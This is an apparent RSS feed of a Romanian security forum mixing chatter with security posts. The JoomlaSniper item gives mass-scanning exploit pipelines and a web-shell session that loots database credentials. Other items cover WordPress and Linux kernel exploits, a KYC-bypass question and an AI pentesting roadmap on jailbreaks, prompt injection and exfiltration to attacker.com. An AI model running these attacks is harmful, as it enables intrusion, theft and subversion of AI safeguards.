<?xml version="1.0"?>
<rss version="2.0"><channel><title>All Forums</title><link>https://rstforums.com/forum/rss/1-all-forums.xml/</link><description>All data</description><language>en</language><item><title>securitate android</title><link><![CDATA[https://rstforums.com/forum/topic/124223-securitate-android/?do=findComment&comment=702148]]></link><description>Ce parere aveti despre Graphene, imi ofera o securitate mai buna a telefonului, astfel ca mesajele si aplicatile sa fie in controlul meu, iar mesajele si apelurile sa nu mai poata fi ascultate?</description><pubDate>Mon, 20 Jul 2026 14:50:57 +0000</pubDate></item><item><title>WordPress Core "wp2shell" RCE flaws get public exploits, patch now</title><link><![CDATA[https://rstforums.com/forum/topic/124222-wordpress-core-wp2shell-rce-flaws-get-public-exploits-patch-now/?do=findComment&comment=702147]]></link><description>On July 17, 2026, WordPress released versions 7.0.2 and 6.9.5 and triggered a forced automatic update across all affected installations, a measure the project reserves for the most severe cases. The cause is a vulnerability chain dubbed wp2shell, which lets an attacker without credentials execute code on the server starting from a single anonymous HTTP request. No plugins are required, no special configuration is needed: a freshly downloaded, never-touched WordPress installation is enough. Less than twenty-four hours after the patch was published, fourteen repositories with exploits, scanners, and test labs had already appeared on GitHub, the most followed of which counts 44 stars and 15 forks.
 


	 
 


	Ref:
 


	 
 


	- https://www.bleepingcomputer.com/news/security/wordpress-core-wp2shell-rce-flaws-get-public-exploits-patch-now/
 


	- https://wordpress.org/news/2026/07/wordpress-7-0-2-release/
 


	- https://pasqualepillitteri.it/en/news/8405/wp2shell-wordpress-rce-cve-2026-63030-en
 


	- https://github.com/NULL200OK/WP2Shell</description><pubDate>Sun, 19 Jul 2026 09:21:46 +0000</pubDate></item><item><title>JoomlaSniper CVE-2026-48907 10/10 CRITIC</title><link><![CDATA[https://rstforums.com/forum/topic/124220-joomlasniper-cve-2026-48907-1010-critic/?do=findComment&comment=702143]]></link><description>JoomlaSniper is a comprehensive exploitation framework for CVE-2026-48907, an unauthenticated Remote Code Execution vulnerability in the JCE (Joomla Content Editor) extension for Joomla CMS.
 


	The vulnerability allows attackers to upload arbitrary PHP files via the unauthenticated profiles.import endpoint, without any authentication. Depending on server configuration, this results in full remote code execution.
 


	 
 

# Full recon pipeline &#x2014; find Joomla sites with JCE
subfinder -d target.com -silent | \
  httpx -silent -match-string "com_jce" | \
  python3 JoomlaSniper.py -t 10 -o results.json

# Shodan export &#x2192; httpx filter &#x2192; JoomlaSniper
cat shodan_results.txt | \
  httpx -silent -path /plugins/editors/jce/jce.xml -status-code -match-code 200 | \
  awk '{print $1}' | \
  python3 JoomlaSniper.py -t 20 --silent -o rce_results.json


	 
 

   JOOMLASNIPR &#x2014; INTERACTIVE SHELL
    Target : https://target.com
    Shell  : https://target.com/tmp/jce4x2k9a.xml.php
    Vector : V1:tmp
&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;&#x2550;

jce@target.com$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

jce@target.com$ sysinfo
OS:   Linux server 5.4.0-208-generic #228-Ubuntu
User: uid=33(www-data)
CWD:  /var/www/html
PHP:  PHP 8.1.27

jce@target.com$ loot
/var/www/html/configuration.php
$user = 'joomla_db_user';
$password = 'S3cur3P@ssw0rd!';
$db = 'joomla_production';
$host = 'localhost';

jce@target.com$ funcs
shell_exec: OK
exec:       OK
system:     OK
passthru:   OK

jce@target.com$ exit
Shell session ended.</description><pubDate>Fri, 17 Jul 2026 10:53:55 +0000</pubDate></item><item><title>Salut tuturor! &#xCE;nc&#xE2;ntat s&#x103; fac parte din aceast&#x103; comunitate &#x1F1F7;&#x1F1F4;</title><link><![CDATA[https://rstforums.com/forum/topic/124210-salut-tuturor-%C3%AEnc%C3%A2ntat-s%C4%83-fac-parte-din-aceast%C4%83-comunitate-%F0%9F%87%B7%F0%9F%87%B4/?do=findComment&comment=702125]]></link><description>Salut, tuturor! 
	 
 


	Sunt bucuros s&#x103; m&#x103; al&#x103;tur acestei comunit&#x103;&#x21B;i &#x219;i sper s&#x103; cunosc oameni pasiona&#x21B;i, gata s&#x103; &#xEE;mp&#x103;rt&#x103;&#x219;easc&#x103; idei &#x219;i experien&#x21B;e valoroase.
 


	De&#x219;i nu sunt din Rom&#xE2;nia, lucrez la proiecte dedicate utilizatorilor rom&#xE2;ni &#x219;i admir comunitatea de aici pentru nivelul ridicat de cuno&#x219;tin&#x21B;e &#x219;i dorin&#x21B;a de a ajuta.
 


	Sunt interesat de SEO, dezvoltare web &#x219;i marketing digital. 
	 
	&#xCE;mi place s&#x103; &#xEE;nv&#x103;&#x21B; lucruri noi &#x219;i, &#xEE;n acela&#x219;i timp, s&#x103; contribui cu informa&#x21B;ii care pot fi utile &#x219;i altor membri.
 


	Dac&#x103; ave&#x21B;i recomand&#x103;ri pentru un nou membru sau sfaturi despre comunitate, le voi aprecia cu mare drag.
 


	V&#x103; mul&#x21B;umesc pentru primire &#x219;i v&#x103; doresc mult succes tuturor! &#x1F60A; 
	 
 


	P.S. Unul dintre proiectele la care lucrez este Verificare Rovinieta, o platform&#x103; creat&#x103; pentru a ajuta &#x219;oferii din Rom&#xE2;nia s&#x103; g&#x103;seasc&#x103; rapid informa&#x21B;ii utile despre verificarea rovinietei &#x219;i alte verific&#x103;ri auto.</description><pubDate>Thu, 09 Jul 2026 02:37:28 +0000</pubDate></item><item><title>Verificare KYC</title><link><![CDATA[https://rstforums.com/forum/topic/124186-verificare-kyc/?do=findComment&comment=702083]]></link><description>Cunoaste cineva cum se poate trece de verificare KYC cu buletinul? (In obs merge, dar nu il ia robotu)</description><pubDate>Mon, 08 Jun 2026 05:42:43 +0000</pubDate></item><item><title>Decodare telefon Sony vechi</title><link><![CDATA[https://rstforums.com/forum/topic/124180-decodare-telefon-sony-vechi/?do=findComment&comment=702073]]></link><description>Salut!
 


	Am acest telefon w910i codat in Vodafone .
 


	Nu am cablu USB pt el.
 


	as avea nevoie de codul NCK.
 


	 
 


	Imei:35155503-799913-1-40
 


	Provider ID:1200-3243
 


	 
 


	As fi recunosc&#x103;tor dac&#x103; s ar gasi o persoana ce mi ar putea genera codul.</description><pubDate>Sat, 30 May 2026 07:26:46 +0000</pubDate></item><item><title>ZA Hacker</title><link><![CDATA[https://rstforums.com/forum/topic/124178-za-hacker/?do=findComment&comment=702067]]></link><description>Hey guys, I am a Polish-South-African, I have worked in Moldova, and partied in Romania a lot. I've always seen this forum around so I finally decided to join it. Anyone who hates the Russians as much as us Polaks, it's the Romanians. So brothers in arms.
 


	 
 


	Cheers,
 


	X</description><pubDate>Tue, 26 May 2026 17:51:57 +0000</pubDate></item><item><title>Copy Fail: 732 Bytes to Root on Every Major Linux Distribution</title><link><![CDATA[https://rstforums.com/forum/topic/124145-copy-fail-732-bytes-to-root-on-every-major-linux-distribution/?do=findComment&comment=702004]]></link><description>Copy Fail (CVE-2026-31431) is a logic bug in the Linux kernel's authencesn cryptographic template. It lets an unprivileged local user trigger a deterministic, controlled 4-byte write into the page cache of any readable file on the system. A single 732-byte Python script can edit a setuid binary and obtain root on essentially all Linux distributions shipped since 2017.
 


	The kernel never marks the corrupted page dirty for writeback, so the file on disk remains unchanged and ordinary on-disk checksum comparisons miss the modification. However, the page cache is what actually gets read when accessing the file, so the corrupted in-memory version is immediately visible system-wide. A local unprivileged user can turn this into root by corrupting the page cache of a setuid binary. The same primitive also crosses container boundaries because the page cache is shared across the host.
 


	This finding was AI-assisted, but began with an insight from Theori researcher Taeyang Lee, who was studying how the Linux crypto subsystem interacts with page-cache-backed data. He used Xint Code to scale his research across the entire crypto subsystem, and Copy Fail was the most critical finding in the report.
 


	 
 


	https://imgur.com/a/z2EsMAg</description><pubDate>Thu, 30 Apr 2026 09:49:27 +0000</pubDate></item><item><title>Salut</title><link><![CDATA[https://rstforums.com/forum/topic/124141-salut/?do=findComment&comment=701990]]></link><description>Ma pote ajuta cineva sa fac ceva la un Joc va rog nu degheaba</description><pubDate>Thu, 23 Apr 2026 21:45:13 +0000</pubDate></item><item><title>Pentest-Tools.com is launching weekly "Office Hours"</title><link><![CDATA[https://rstforums.com/forum/topic/124137-pentest-toolscom-is-launching-weekly-office-hours/?do=findComment&comment=701982]]></link><description><![CDATA[Am primit un email de la Pentest-Tools.com. 
	Încep sesiuni live săptămânale „Office Hours”, în fiecare miercuri.
 


	Prima sesiune: Compliance (SOC 2, ISO 27001, PCI DSS) – cum să gestionezi corect dovezile pentru audit.
 


	Host: Jan Pedersen 
	Când: Miercuri, 22 Aprilie 2026 
	Unde: Zoom
 


	Intervale: 
	Sesiunea 1: 15:00 București / 13:00 Londra / 08:00 New York 
	Sesiunea 2: 19:00 București / 17:00 Londra / 12:00 New York / 09:00 Los Angeles
 


	Ce vei învăța:
 


	
		Scanare continuă pentru audit
	
	
		Generare automată de dovezi
	
	
		Integrare cu SOC 2, ISO 27001 și PCI DSS
	



	Include demo și sesiune de întrebări.
 


	Înregistrare: 
	https://zoom.us/webinar/register/WN_pnkMFZy9Q0KezdTDeC6fdw?utm_source=newsletter&amp;utm_medium=email&amp;utm_campaign=office-hours-with-jan 
	https://zoom.us/webinar/register/WN_7er_VRcPRrebDOPnwl9f2w?utm_source=newsletter&amp;utm_medium=email&amp;utm_campaign=office-hours-with-jan]]></description><pubDate>Tue, 21 Apr 2026 04:43:13 +0000</pubDate></item><item><title>Salutare all</title><link><![CDATA[https://rstforums.com/forum/topic/124104-salutare-all/?do=findComment&comment=701921]]></link><description>Va salut am o &#xEE;ntrebare are cineva un cont de rockstar sa imi &#xEE;mprumute sa joc gta 5 online c&#xE2;teva zile max o s&#x103;pt&#x103;m&#xE2;n&#x103;</description><pubDate>Sat, 04 Apr 2026 00:33:41 +0000</pubDate></item><item><title>Open Tracker Signups, Applications, and Invites</title><link><![CDATA[https://rstforums.com/forum/topic/124081-open-tracker-signups-applications-and-invites/?do=findComment&comment=701851]]></link><description>Invitatii Trackers/Open Signups</description><pubDate>Wed, 18 Mar 2026 19:28:59 +0000</pubDate></item><item><title>Propunere schimbare ni&#x219;&#x103; pentru forum</title><link><![CDATA[https://rstforums.com/forum/topic/124079-propunere-schimbare-ni%C8%99%C4%83-pentru-forum/?do=findComment&comment=701844]]></link><description><![CDATA[Dacă tot avem atâția ani de experiență în spate și încă mai știu o gramadă de persoane de RST, ce ar fi dacă am schimba direcția forumului către automatizări, tips &amp; tricks, AI și monetizare, fără a intra vreodată în zona fraudei pe care am încercat mereu să o combatem? Am de 15 ani schițată metoda ideală de monetizare pentru RST, consider că încă este validă, și nu văd de ce nu am începe să facem bani și să îi ajutăm și pe alții să facă bani cu ajutorul nostru fără a încălca legislația. 
	 
	Admini și useri ce părere aveți? Îi dăm drumul la treabă? Ne dedicăm energia să facem o treabă serioasă care să aducă cu adevărat plus valoare, sau îi lăsăm pe toți diletanții de pe comunități ca BlackHatWorld să facă bani din mizerii, țepe și tutoriale care nu funcționează? Comunitatea RST a fost mereu corectă cu userii și nu a promovat țepe. De ce nu am face din treaba asta și din experiența noastră, a tuturor, un business din care să producem bani?]]></description><pubDate>Tue, 17 Mar 2026 16:27:46 +0000</pubDate></item><item><title>Ajutor deschidere baze de date contabile</title><link><![CDATA[https://rstforums.com/forum/topic/124077-ajutor-deschidere-baze-de-date-contabile/?do=findComment&comment=701841]]></link><description><![CDATA[Va salut! Am o situatie foarte grava in familie. Tata are o firma din 1996 unde e asociat unic, de pe care maica-mea fara niciun fel de imputernicire notariala i-a furat o gramada de marfa convingand fosta contabila ca tata e schizofrenic si convingand-o pe contabila sa nu tina legatura cu acesta, ci doar cu ea. Maica-mea si-a facut ea un alt SRL si a luat marfa de pe SRL-ul lui tata pe al ei falsificand semnatura tatalui meu in facturi si la Registrul Comertului. Am depus plangere la Politia Economica dar pare ca nu se misca nimic deocamdata.
 


	Intre timp a intentat si divort de el la judecatorie si s-a mutat la un amant.
 


	Contabila ne-a dat pe mail dosarele celor doua firme, dar nu reuseste nimeni sa le deschida ca sa vedem facturile. Evident ca acum fosta contabila nu mai raspunde la usa si telefon.  Am incercat cu SAGA si alte programe de contabilitate dar nimic. Ma poate ajuta cineva? 😌 Gratitude for you!
 


	 
 


	Atasez bazele de date: - &lt;redacted&gt;]]></description><pubDate>Mon, 16 Mar 2026 17:10:28 +0000</pubDate></item><item><title>Daca ma poate ajuta careva</title><link><![CDATA[https://rstforums.com/forum/topic/124076-daca-ma-poate-ajuta-careva/?do=findComment&comment=701835]]></link><description>salutare, am si eu un cont de steam vechi de vreo 17 ani cred, inactiv de 9,10 ani, mi am uitat parola, iar cei de la steam nu accepta da mi trimita link pentru resetare parola decat daca le trimit un cd key, eu steam ul l am cumparat prin sms cum era pe vremuri , sms , luau euro din cont si primeam condul, acum nu mai am nimic decat acces la adresa de mail</description><pubDate>Sat, 14 Mar 2026 17:58:29 +0000</pubDate></item><item><title>Vand advertoriale in aproximativ 700 site uri din romania</title><link><![CDATA[https://rstforums.com/forum/topic/124061-vand-advertoriale-in-aproximativ-700-site-uri-din-romania/?do=findComment&comment=701805]]></link><description>Vand mai multe pachete de advertoriale la pret bun, site uri cu autoritate medie, sau mare si am si o oferta f buna, advertoriale pe 107 site uri cu 2500 lei</description><pubDate>Fri, 06 Mar 2026 07:56:30 +0000</pubDate></item><item><title>Large-scale online deanonymization with LLMs</title><link><![CDATA[https://rstforums.com/forum/topic/124058-large-scale-online-deanonymization-with-llms/?do=findComment&comment=701781]]></link><description>We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identityrelevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix prize) that required structured data , our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using crossplatform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user&#x2019;s Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision compared to near 0% for the best non-LLM method. Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered.
 


	 
 


	Download: https://arxiv.org/pdf/2602.16800</description><pubDate>Fri, 27 Feb 2026 14:27:32 +0000</pubDate></item><item><title>AI/ML Pentesting Roadmap</title><link><![CDATA[https://rstforums.com/forum/topic/124057-aiml-pentesting-roadmap/?do=findComment&comment=701780]]></link><description><![CDATA[🛡️ AI/ML Pentesting Roadmap
	



	
 


	
		A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner.
	 




	
		📋 Table of Contents
	



	
		Prerequisites
	
	
		Phase 1 — Foundations
	
	
		Phase 2 — AI/ML Security Concepts
	
	
		Phase 3 — Prompt Injection &amp; LLM Attacks
	
	
		Phase 4 — Hands-On Practice
	
	
		Phase 5 — Advanced Exploitation Techniques
	
	
		Phase 6 — Real-World Research &amp; Bug Bounty
	
	
		Standards, Frameworks &amp; References
	
	
		Tools &amp; Repositories
	
	
		Books, PDFs &amp; E-Books
	
	
		Video Resources
	
	
		CTF &amp; Competitions
	
	
		Bug Bounty Programs
	
	
		Community &amp; News
	
	
		Suggested Learning Path by Experience Level
	




	
		Prerequisites
	



	Before diving into AI/ML pentesting, ensure you have the following foundation:
 


	
		General Security Basics
	



	
		PortSwigger Web Security Academy — Free, hands-on web security training (XSS, SQLi, SSRF, etc.)
	
	
		TryHackMe — Pre-Security Path
	
	
		HackTheBox Academy
	
	
		OWASP Top 10
	



	
		Programming (Python is essential)
	



	
		Python for Everybody — Coursera
	
	
		Automate the Boring Stuff with Python — Free online book
	
	
		CS50P — Python — Free Harvard course
	



	
		APIs &amp; HTTP
	



	
		Understand REST APIs, HTTP methods, headers, and authentication flows
	
	
		Postman Learning Center
	
	
		Practice with tools: curl, Burp Suite, Postman
	




	
		Phase 1 — Foundations
	



	
		1.1 Machine Learning Fundamentals
	



	
		
			
				Resource
			
			
				Type
			
			
				Cost
			
		
	
	
		
			
				Machine Learning — Andrew Ng (Coursera)
			
			
				Course
			
			
				Audit Free
			
		
		
			
				Introduction to ML — edX
			
			
				Course
			
			
				Audit Free
			
		
		
			
				fast.ai Practical Deep Learning
			
			
				Course
			
			
				Free
			
		
		
			
				Google Machine Learning Crash Course
			
			
				Course
			
			
				Free
			
		
		
			
				Kaggle ML Courses
			
			
				Course
			
			
				Free
			
		
		
			
				3Blue1Brown — Neural Networks
			
			
				Video
			
			
				Free
			
		
	



	
		1.2 Large Language Models (LLMs)
	



	Understanding how LLMs work is critical before attacking them.
 


	
		
			
				Resource
			
			
				Type
			
			
				Cost
			
		
	
	
		
			
				Andrej Karpathy — Intro to LLMs
			
			
				Video
			
			
				Free
			
		
		
			
				Andrej Karpathy — Let's build GPT
			
			
				Video
			
			
				Free
			
		
		
			
				Hugging Face NLP Course
			
			
				Course
			
			
				Free
			
		
		
			
				LLM University by Cohere
			
			
				Course
			
			
				Free
			
		
		
			
				Prompt Engineering Guide
			
			
				Guide
			
			
				Free
			
		
	




	
		Phase 2 — AI/ML Security Concepts
	



	
		2.1 Core Security Concepts
	



	
		OWASP LLM Top 10 — The definitive OWASP list for LLM vulnerabilities
	
	
		MITRE ATLAS Matrix — Adversarial Tactics, Techniques, and Common Knowledge for AI systems
	
	
		NIST AI Risk Management Framework — Federal AI risk guidance
	
	
		IBM — AI Security Overview
	
	
		AI Village — LLM Threat Modeling
	
	
		Promptingguide — Adversarial Attacks
	
	
		HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI
	



	
		2.2 Attack Surface Overview
	



	Key attack vectors in AI/ML systems:
 


	
		Prompt Injection — Manipulating LLM behavior through crafted inputs
	
	
		Jailbreaking — Bypassing safety filters and guardrails
	
	
		Model Inversion — Extracting training data from a model
	
	
		Membership Inference — Determining if data was in training set
	
	
		Data Poisoning — Corrupting training data to influence behavior
	
	
		Adversarial Examples — Perturbed inputs that fool classifiers
	
	
		Model Extraction/Stealing — Cloning a model via API queries
	
	
		Supply Chain Attacks — Malicious models/weights on platforms like Hugging Face
	
	
		Insecure Plugin/Tool Integration — Exploiting LLM agents with external tools
	
	
		Training Data Exfiltration — Extracting memorized private data
	
	
		Denial of Service — Overloading models via crafted prompts
	



	
		2.3 MLOps &amp; Infrastructure Security
	



	
		From MLOps to MLOops — JFrog
	
	
		Offensive ML Playbook
	
	
		AI Exploits — ProtectAI
	
	
		Awesome AI Security — ottosulin
	




	
		Phase 3 — Prompt Injection &amp; LLM Attacks
	



	
		3.1 Understanding Prompt Injection
	



	
		IBM Guide on Prompt Injection
	
	
		Simon Willison's Explanation of Prompt Injection
	
	
		Learn Prompting — Prompt Hacking and Injection
	
	
		PortSwigger LLM Attacks
	
	
		NCC Group — Exploring Prompt Injection Attacks
	
	
		Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection
	



	
		3.2 Jailbreaking Techniques
	



	
		DAN (Do Anything Now) — Classic jailbreak technique: Chatgpt-DAN Repo
	
	
		Role-playing / Persona manipulation
	
	
		Token smuggling — Encoding instructions to bypass filters
	
	
		Prompt leaking — Extracting system prompts
	
	
		Indirect prompt injection — Attacks via documents, web content, memory
	
	
		WideOpenAI — Jailbreak Collection
	
	
		PayloadsAllTheThings — Prompt Injection
	
	
		PALLMs — Payloads for Attacking LLMs
	



	
		3.3 Indirect Prompt Injection
	



	A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes.
 


	
		Greshake — LLM Security / Not What You've Signed Up For
	
	
		Embrace The Red — Blog — Comprehensive blog covering real-world indirect injection
	
	
		GitHub Copilot Chat: Prompt Injection to Data Exfiltration
	
	
		Google AI Studio Data Exfiltration
	



	
		3.4 Advanced Prompt Attack Techniques
	



	
		How to Persuade an LLM to Change Its System Prompt
	
	
		Bugcrowd Ultimate Guide to AI Security (PDF)
	
	
		Snyk OWASP Top 10 LLM (PDF)
	
	
		Vanna.AI Prompt Injection RCE — JFrog
	




	
		Phase 4 — Hands-On Practice
	



	
		4.1 Interactive Platforms &amp; Games
	



	
		
			
				Platform
			
			
				Description
			
			
				Link
			
		
	
	
		
			
				Gandalf
			
			
				LLM prompt testing game — extract the password
			
			
				gandalf.lakera.ai
			
		
		
			
				Prompt Airlines
			
			
				Gamified prompt injection learning
			
			
				promptairlines.com
			
		
		
			
				Crucible
			
			
				Interactive AI security challenges by Dreadnode
			
			
				crucible.dreadnode.io
			
		
		
			
				Immersive Labs AI
			
			
				Structured AI security exercises
			
			
				prompting.ai.immersivelabs.com
			
		
		
			
				Secdim AI Games
			
			
				Prompt injection games
			
			
				play.secdim.com/game/ai
			
		
		
			
				HackAPrompt
			
			
				Community prompt injection competition
			
			
				hackaprompt.com
			
		
		
			
				PortSwigger LLM Labs
			
			
				Hands-on web LLM attack labs
			
			
				Web Security Academy
			
		
	



	
		4.2 Vulnerable-by-Design Projects
	



	
		
			
				Repository
			
			
				Description
			
		
	
	
		
			
				Damn Vulnerable LLM Agent — WithSecureLabs
			
			
				Intentionally vulnerable LLM agent
			
		
		
			
				ScottLogic Prompt Injection Playground
			
			
				Local prompt injection lab
			
		
		
			
				Greshake LLM Security Tools
			
			
				Proof-of-concept attacks
			
		
	



	
		4.3 CTF Writeups to Study
	



	
		CTF Writeup — HackPack CTF 2024 LLM Edition
	
	
		LLM Pentest Writeups — System Weakness
	




	
		Phase 5 — Advanced Exploitation Techniques
	



	
		5.1 Agent &amp; Tool Integration Attacks
	



	When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically.
 


	
		LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec
	
	
		LLM Pentest: Leveraging Agent Integration For RCE (full)
	
	
		Dumping a Database with an AI Chatbot — Synack
	
	
		CSWSH Meets LLM Chatbots
	



	
		5.2 Data Exfiltration via LLMs
	



	
		Google AI Studio: LLM-Powered Data Exfiltration
	
	
		Google AI Studio Mass Data Exfil (Regression)
	
	
		Hacking Google Bard — From Prompt Injection to Data Exfiltration
	
	
		AWS Amazon Q Markdown Rendering Vulnerability
	
	
		GitHub Copilot Chat Data Exfiltration
	



	
		5.3 Account Takeover &amp; Authentication Attacks
	



	
		ChatGPT Account Takeover — Wildcard Web Cache Deception
	
	
		Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception)
	
	
		Security Flaws in ChatGPT Ecosystem — Salt Security
	
	
		OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx
	



	
		5.4 XSS &amp; Web Vulnerabilities in AI Products
	



	
		XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva
	
	
		Zeroday on GitHub Copilot
	



	
		5.5 Model &amp; Infrastructure Attacks
	



	
		Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9)
	
	
		From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva
	



	
		5.6 Persistent Attacks &amp; Memory Exploitation
	



	
		ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red
	



	
		5.7 Adversarial Machine Learning
	



	
		CleverHans Library — Adversarial example library
	
	
		ART (Adversarial Robustness Toolbox) — IBM
	
	
		Foolbox — Python toolbox for adversarial attacks
	




	
		Phase 6 — Real-World Research &amp; Bug Bounty
	



	
		6.1 Notable Research &amp; Disclosures
	



	
		We Hacked Google AI for $50,000 — LandH
	
	
		New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer
	
	
		Jailbreak of Meta AI (Llama 3.1) Revealing Config Details
	
	
		Bypass Instructions to Manipulate Google Bard
	
	
		My LLM Bug Bounty Journey on Hugging Face Hub
	
	
		Anonymised Penetration Test Report — Volkis
	
	
		Lakera Real World LLM Exploits (PDF)
	



	
		6.2 How to Find LLM Vulnerabilities
	



	Key areas to test when assessing an LLM-powered application:
 


	
		System prompt extraction — Can you leak the hidden system prompt?
	
	
		Instruction override — Can you ignore system-level instructions?
	
	
		Plugin/tool abuse — Can agent tools be misused (SSRF, RCE, SQLi)?
	
	
		Data exfiltration via markdown — Does the UI render ![](https://attacker.com?q=...) ?
	
	
		Persistent injection via memory — Can you inject instructions that persist in memory/RAG?
	
	
		PII leakage — Does the model reveal training data or other users' data?
	
	
		Cross-user data leakage — In multi-tenant apps, can you access other users' contexts?
	
	
		Authentication bypass — Can you trick the LLM into performing privileged actions?
	




	
		Standards, Frameworks &amp; References
	



	
		
			
				Resource
			
			
				Description
			
		
	
	
		
			
				OWASP LLM Top 10
			
			
				Top 10 LLM vulnerability classes
			
		
		
			
				MITRE ATLAS
			
			
				AI adversarial threat matrix
			
		
		
			
				NIST AI RMF
			
			
				US Federal AI risk management framework
			
		
		
			
				OWASP AI Exchange
			
			
				Cross-industry AI security guidance
			
		
		
			
				ISO/IEC 42001
			
			
				International AI management standard
			
		
		
			
				ENISA AI Threat Landscape
			
			
				EU AI threat landscape report
			
		
		
			
				Google Secure AI Framework (SAIF)
			
			
				Google's AI security framework
			
		
	




	
		Tools &amp; Repositories
	



	
		Offensive Tools
	



	
		
			
				Tool
			
			
				Purpose
			
		
	
	
		
			
				Garak
			
			
				LLM vulnerability scanner
			
		
		
			
				PyRIT
			
			
				Microsoft's Python Risk Identification Toolkit for LLMs
			
		
		
			
				LLM Fuzzer
			
			
				Fuzzing framework for LLMs
			
		
		
			
				PALLMs
			
			
				Payloads for attacking LLMs
			
		
		
			
				PromptInject
			
			
				Prompt injection attack framework
			
		
		
			
				PurpleLlama / CyberSecEval
			
			
				Meta's LLM security evaluation
			
		
	



	
		Defensive / Scanning Tools
	



	
		
			
				Tool
			
			
				Purpose
			
		
	
	
		
			
				Rebuff
			
			
				Prompt injection detection
			
		
		
			
				NeMo Guardrails
			
			
				NVIDIA guardrail framework
			
		
		
			
				Lakera Guard
			
			
				Commercial prompt injection protection
			
		
		
			
				AI Exploits — ProtectAI
			
			
				Real-world ML exploit collection
			
		
		
			
				ModelScan
			
			
				Scan ML model files for malicious code
			
		
	



	
		Reference Lists
	



	
		
			
				Resource
			
			
				Description
			
		
	
	
		
			
				Awesome LLM Security — corca-ai
			
			
				Curated LLM security list
			
		
		
			
				Awesome LLM — Hannibal046
			
			
				Everything LLM including security
			
		
		
			
				Awesome AI Security — ottosulin
			
			
				General AI security resources
			
		
		
			
				LLM Hacker's Handbook
			
			
				Comprehensive hacking handbook
			
		
		
			
				PayloadsAllTheThings — Prompt Injection
			
			
				Payload collection
			
		
		
			
				WideOpenAI
			
			
				Jailbreak and bypass collection
			
		
		
			
				Chatgpt-DAN
			
			
				DAN jailbreak collection
			
		
	




	
		Books, PDFs &amp; E-Books
	



	
		
			
				Resource
			
			
				Link
			
		
	
	
		
			
				LLM Hacker's Handbook
			
			
				GitHub
			
		
		
			
				OWASP Top 10 for LLM (Snyk)
			
			
				PDF
			
		
		
			
				Bugcrowd Ultimate Guide to AI Security
			
			
				PDF
			
		
		
			
				Lakera Real World LLM Exploits
			
			
				PDF
			
		
		
			
				HackerOne Ultimate Guide to Managing AI Risks
			
			
				E-Book
			
		
		
			
				Adversarial Machine Learning — Goodfellow et al.
			
			
				arXiv
			
		
	




	
		Video Resources
	



	
		
			
				Resource
			
			
				Link
			
		
	
	
		
			
				Penetration Testing Against and With AI/LLM/ML (Playlist)
			
			
				YouTube
			
		
		
			
				Andrej Karpathy — Intro to Large Language Models
			
			
				YouTube
			
		
		
			
				DEF CON AI Village Talks
			
			
				YouTube
			
		
		
			
				LiveOverflow — AI/ML Security
			
			
				YouTube
			
		
		
			
				3Blue1Brown — Neural Networks Series
			
			
				YouTube
			
		
		
			
				John Hammond — AI Security Challenges
			
			
				YouTube
			
		
		
			
				Cybrary — Machine Learning Security
			
			
				Cybrary
			
		
	




	
		CTF &amp; Competitions
	



	
		
			
				Competition
			
			
				Description
			
			
				Link
			
		
	
	
		
			
				Crucible
			
			
				Ongoing AI security challenges
			
			
				crucible.dreadnode.io
			
		
		
			
				HackAPrompt
			
			
				Annual prompt injection competition
			
			
				hackaprompt.com
			
		
		
			
				AI Village CTF (DEF CON)
			
			
				Annual AI security CTF at DEF CON
			
			
				aivillage.org
			
		
		
			
				Gandalf
			
			
				Self-paced LLM challenge
			
			
				gandalf.lakera.ai
			
		
		
			
				Prompt Airlines
			
			
				Gamified injection challenges
			
			
				promptairlines.com
			
		
		
			
				Hack The Box AI Challenges
			
			
				HTB AI-themed challenges
			
			
				hackthebox.com
			
		
		
			
				Secdim AI Games
			
			
				Web-based AI security games
			
			
				play.secdim.com/game/ai
			
		
	




	
		Bug Bounty Programs
	



	AI/ML security bug bounties are growing rapidly. Target these platforms:
 


	
		
			
				Program
			
			
				Scope
			
			
				Link
			
		
	
	
		
			
				OpenAI Bug Bounty
			
			
				ChatGPT, API, plugins
			
			
				bugcrowd.com/openai
			
		
		
			
				Google AI Bug Bounty
			
			
				Gemini, Bard, Vertex AI
			
			
				bughunters.google.com
			
		
		
			
				Meta AI Bug Bounty
			
			
				Llama models, Meta AI
			
			
				facebook.com/whitehat
			
		
		
			
				HuggingFace via ProtectAI
			
			
				Hub, models, spaces
			
